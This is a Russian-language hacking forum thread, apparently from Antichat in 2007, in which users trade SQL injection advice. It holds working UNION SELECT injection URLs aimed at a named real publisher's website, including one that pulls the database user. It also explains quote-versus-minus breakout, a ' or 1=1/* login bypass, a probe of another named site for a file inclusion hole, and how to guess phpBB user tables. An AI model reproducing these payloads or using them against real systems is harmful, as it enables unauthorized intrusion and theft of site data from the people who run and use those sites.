05.11.2007, 04:32
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
>у меня еще несколько вопросов.
>1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,3,4,5,6/*
>2. когда надо ставить перед значением параметра минус, а когда кавычку после?
Зависит от самого запроса, например
Код:
"SELECT `date`,`post` FROM `forum` where id='".$id."' and id > 5;"
тут нужно будет ставить кавычку и получится
Код:
"SELECT `date`,`post` FROM `forum` where id=''SQL-inj /* and id > 5;'"
т.е. мы "выходим" из id=''
- ставить не обязательно, нужно лишь чтобы "левы" (не наш) запрос не выполнился, это можно сделать "-", and 1=0, or 1=1, limit 0 и т.д.
>3. что можно сделать, кроме брута, если версия бд меньше 5?
посимвольный подбор\угадывание. Если сайт на паблик двиге - установить двиг и посмотреть |
|
|
05.11.2007, 04:32
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
1. Это скуля
Код:
http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6/*
2. когда перменная строкового типа (присутствуют не только цифры) надо ставить кавычку
когда переменная "числовая" надо ставить минус (хотя и не обязательно), но бывает, что даже если присутствуют только цифры, это все равно переменная строкового типа, в таком случае надо ставить кавычку... (т.е. закрывать для корректности запроса)
3. только искать заранее известные таблицы, например если есть на сайте форум phpBB, то логично искать табличку phpbb_users, хотя иногда форум располагается в другой БД, тогда надо знать еще и имя БД форума, также при установке форума, иногда меняют префикс (phpbb_) тогда его тоже нужно подбирать
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2007, 14:20
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
http://www.hackzona.ru/hz.php?name=Forums&file=viewtopic&t=14033 при этом запросе хакзона пишет
Только что ходил по ссылке - все нормально.
|
|
|
|
05.11.2007, 15:09
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
мля я захожу у меня ошибка sql синтаксиса пишет хз
|
|
|
|
05.11.2007, 19:14
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
http://se-t.net/index.php?pg=
Есть ли тут инклюд?
|
|
|
|
05.11.2007, 19:17
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от delay(0)
http://se-t.net/index.php?pg=
Есть ли тут инклюд?
Нет. Там есть функция file и вряд ли что получится сделать.
|
|
|
|
06.11.2007, 15:18
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Ребят может не в тему, но каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?
|
|
|
|
06.11.2007, 15:25
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
2 nikoTM
Примерно таким:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";
Тогда при вставке твоего кода получается:
$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';
То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 06.11.2007 в 15:30..
|
|
|
|
06.11.2007, 15:38
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
1ten0.0net1, спасибо
|
|
|
|
06.11.2007, 17:13
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Как можно замутить иньекцию если стоит запрос
$mysql_query="SELECT * FROM что-то ORDER BY".$_GET['sb'];
?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
